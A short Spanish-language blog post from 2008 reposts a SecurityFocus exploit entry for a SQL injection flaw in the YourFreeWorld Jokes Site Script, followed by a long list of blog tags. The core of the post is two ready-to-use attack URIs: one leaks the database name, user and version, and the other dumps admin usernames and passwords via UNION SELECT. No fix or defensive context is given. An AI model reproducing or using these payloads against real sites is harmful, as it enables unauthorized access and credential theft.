viernes, 7 de noviembre de 2008

YourFreeWorld Jokes Site Script 'categorie' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/jokesite/jokes.php?catagorie=-1%20union%20select%201,convert(concat(database(),char(58),user(),char(58),version()),char)/*

http://www.example.com/jokes.php?catagorie=-5+UNION+SELECT+1,concat(0x3a,Username,0x3a,Password)+from+adminsettings--

fuente:
http://www.securityfocus.com/bid/28963/exploit

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (225) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)